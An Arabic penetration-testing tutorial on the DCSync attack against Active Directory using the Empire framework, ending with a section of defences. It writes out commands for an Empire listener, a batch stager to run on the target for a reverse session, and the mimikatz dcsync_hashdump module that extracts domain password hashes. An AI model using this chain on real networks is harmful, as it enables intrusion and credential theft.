الاستيلاء على Active Directory: باستخدام اداة Empire وهجوم DCSync
تُعد بيئات Active Directory قلب بنى الشبكات في معظم المؤسسات الكبيرة، حيث تُمكن هذه البيئة من إدارة المستخدمين والأجهزة والسياسات الأمنية بشكل مركزي. ومع زيادة أهمية هذه البيئة، ظهرت العديد من التهديدات والهجمات التي تستهدف Active Directory، ومن بينها هجوم DCSync. هجوم DCSync هو أحد أخطر أنواع الهجمات، حيث يمكن للمهاجم من خلاله الحصول على الهاشات الخاصة بكلمات مرور المستخدمين في النظام، مما يمهد الطريق لهجمات أخرى مثل Pass-the-Hash وKerberos Ticket Forgery.
في هذا المقال، سنناقش كيفية تنفيذ هجوم DCSync باستخدام أداة Empire، وهي إطار عمل مفتوح المصدر يُستخدم في اختبار الاختراق ويمكن من خلاله تنفيذ هجمات معقدة مثل DCSync. سنبدأ بشرح مفاهيم الهجوم، متطلبات تنفيذه، وكيفية استخدام Empire لعمل hashdump للمستخدمين في بيئة نطاق (Domain) محددة.
ما هو هجوم DCSync؟
هجوم DCSync يعتمد على استغلال بروتوكول MS-DRSR (Microsoft Directory Replication Service Remote Protocol) الذي يُستخدم في تكرار البيانات بين وحدات التحكم بالدومين في بيئة Active Directory. في الظروف الطبيعية، تستخدم وحدات التحكم بالدومين هذا البروتوكول لتبادل البيانات وضمان تزامنها عبر جميع وحدات التحكم. ومع ذلك، يمكن للمهاجم الذي يمتلك امتيازات مرتفعة محاكاة وظيفة وحدة تحكم الدومين وطلب نسخ بيانات الحسابات من وحدات التحكم الشرعية.
بواسطة هذا الهجوم، يمكن للمهاجمين استخراج الهاشات الخاصة بكلمات المرور، مما يمنحهم القدرة على:
- استخدام الهاشات: تشغيل هجمات مثل Pass-the-Hash، والتي تسمح للمهاجم بالوصول إلى موارد الشبكة بدون الحاجة إلى فك تشفير كلمات المرور.
- تزوير تذاكر Kerberos: تصنيع تذاكر Kerberos مزيفة، ما يُعرف بهجوم Golden Ticket ، والذي يمنح المهاجمين صلاحيات وصول كاملة إلى الشبكة المستهدفة.
متطلبات الهجوم
لتنفيذ هجوم DCSync باستخدام Empire، نحتاج إلى البيئة والمعدات التالية:
1. بيئة Windows Domain: نظام مستهدف يعمل بنظام Windows ويعتمد على Active Directory لإدارة المستخدمين والسياسات.
2. أداة Empire: تثبيت Empire Framework على جهاز المهاجم. Empire هو إطار عمل مرن يدعم تنفيذ العديد من الهجمات الموجهة لنظم Windows.
3. صلاحيات عالية (High Privileges): يجب على المهاجم امتلاك حساب مستخدم بامتيازات عالية في النظام المستهدف، مثل Domain Admin، لتنفيذ الهجوم بنجاح.
إعداد بيئة Empire
1. تثبيت Empire
للبدء، نحتاج إلى تثبيت Empire على جهاز المهاجم. يمكن تحميل Empire من مستودع GitHub الخاص بالاداة (https://github.com/BC-SECURITY/Empire). بعد تحميل الملفات المطلوبة، يمكننا تثبيت Empire باستخدام الأوامر التالية:
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
./setup/install.shبمجرد الانتهاء من التثبيت، يمكن تشغيل Empire باستخدام الأمر التالي:
./empire
2. تهيئة الوكيل (Listener)
قبل إنشاء الاتصال مع النظام المستهدف، يجب علينا إعداد وكيل (Listener) لاستقبال الاتصالات العكسية. يمكن القيام بذلك عن طريق:
listeners uselistener http set Name DCSyncListener set Port 8080 execute
هنا، نقوم بإعداد وكيل باستخدام بروتوكول HTTP على المنفذ 8080.
3. إنشاء وكيل (Stager)
بعد إعداد الوكيل، يمكننا إنشاء وكيل (Stager) لإطلاق الجلسة مع النظام المستهدف. Empire يوفر عدة أنواع من Stagers، وسنستخدم هنا النوع launcher_bat.
usestager windows/launcher_bat
set Listener DCSyncListener
executeسيقوم هذا الأمر بإنشاء ملف BAT يمكنك إرساله للنظام المستهدف وتنفيذه للحصول على جلسة Empire. بعد تشغيل الملف على النظام المستهدف، سنتمكن من التحكم في الجهاز المستهدف من خلال جلسة جديدة في Empire.
تنفيذ هجوم DCSync باستخدام Empire
1. التفاعل مع الجلسة النشطة
بمجرد تشغيل الوكيل على النظام المستهدف، سيظهر لنا في قائمة الجلسات النشطة. يمكننا التفاعل مع الجلسة باستخدام الأمر:
agents interact <Agent_Name>
حيث يمثل <Agent_Name> اسم الجلسة النشطة التي تم إنشاؤها. هذه الجلسة تتيح لنا تنفيذ الأوامر على النظام المستهدف.
2. تنفيذ هجوم DCSync
لإجراء هجوم DCSync، سنستخدم موديول mimikatz المدمج في Empire، والذي يتيح استخراج الهاشات من وحدات التحكم بالنطاق.
usemodule credentials/mimikatz/dcsync_hashdump set user <Domain\Admin_Username> execute
في هذا المثال، نقوم بتحديد اسم المستخدم الذي يمتلك صلاحيات إدارية في النطاق. إذا كانت الصلاحيات متوفرة، سيتم تنفيذ الهجوم واستخراج الهاشات.
3. حفظ الهاشات لاستخدامها لاحقًا
بعد اكتمال الهجوم، ستظهر لنا قائمة بالهاشات الخاصة بالمستخدمين في النطاق. يمكننا حفظ هذه الهاشات في ملف لاستخدامها في هجمات لاحقة، مثل Pass-the-Hash.
استغلال الهاشات المستخرجة
1. هجوم Pass-the-Hash
بمجرد الحصول على الهاشات، يمكننا استخدامها للوصول إلى الأنظمة الأخرى في النطاق دون الحاجة إلى معرفة كلمة المرور الفعلية. هذا النوع من الهجمات يعتمد على تمرير الهاش (Pass-the-Hash) للوصول إلى الموارد.
2. هجوم Golden Ticket
تُعد هجمات Golden Ticket أحد أقوى أنواع الهجمات التي يمكن تنفيذها بعد الحصول على الهاشات. باستخدام TGT (Ticket Granting Ticket) مزيف، يمكن للمهاجم الحصول على صلاحيات إدارية كاملة على الشبكة لفترة غير محدودة.
الوقاية والحماية من هجوم DCSync
بما أن هجوم DCSync يعتبر خطيرًا، فمن المهم أن تكون الأنظمة المحمية على دراية به وتقوم بتطبيق إجراءات لحماية بيئة Active Directory من مثل هذه الهجمات.
1. تقليل الامتيازات المتاحة
يجب الحد من الحسابات التي تمتلك صلاحيات عالية، مثل حسابات Domain Admin. يمكن تقليل عدد هذه الحسابات وتقسيم الأدوار بحيث لا يمتلك المستخدمون صلاحيات أكثر مما يحتاجون إليه.
2. مراقبة السجلات والأحداث
يجب مراقبة سجلات Active Directory بانتظام للتعرف على أي محاولات غير طبيعية لتكرار البيانات. يمكن استخدام أدوات مثل **SIEM** للكشف عن مثل هذه الأنشطة.
3. تحديث الأنظمة بانتظام
تأكد من تثبيت جميع التحديثات الأمنية اللازمة لوحدات التحكم بالنطاق والخوادم. التحديثات الأمنية تساعد في منع الهجمات المعروفة.
4. تفعيل LAPS (Local Administrator Password Solution)
LAPS هي أداة من مايكروسوفت تتيح إدارة كلمات المرور المحلية بشكل آمن. يمكن استخدامها لتغيير كلمات مرور حسابات المسؤول المحلية بشكل دوري وتخزينها في Active Directory بطريقة مشفرة.
5. استخدام الفلاتر على استعلامات DRSR
يمكن استخدام فلاتر على استعلامات DRSR لمنع الحسابات غير المصرح لها من طلب تكرار البيانات. هذا يمكن أن يمنع حسابات المستخدمين المميزة من إساءة استخدام هذه الصلاحيات.
خاتمة
يُعد هجوم DCSync من الهجمات القوية والخطيرة التي تستهدف بيئات Windows Domain. باستخدام Empire، يمكن للمهاجمين تنفيذ هذا الهجوم بسهولة إذا كان لديهم صلاحيات كافية على الشبكة المستهدفة. من الضروري على مديري النظام أن يكونوا على دراية بهذا النوع من الهجمات وأن يتخذوا الإجراءات المناسبة لحماية أنظمتهم من مثل هذه التهديدات. تطبيق السياسات الأمنية المناسبة ومراقبة الأنظمة بشكل مستمر يمكن أن يساعد في منع هذه الهجمات والحد من تأثيرها.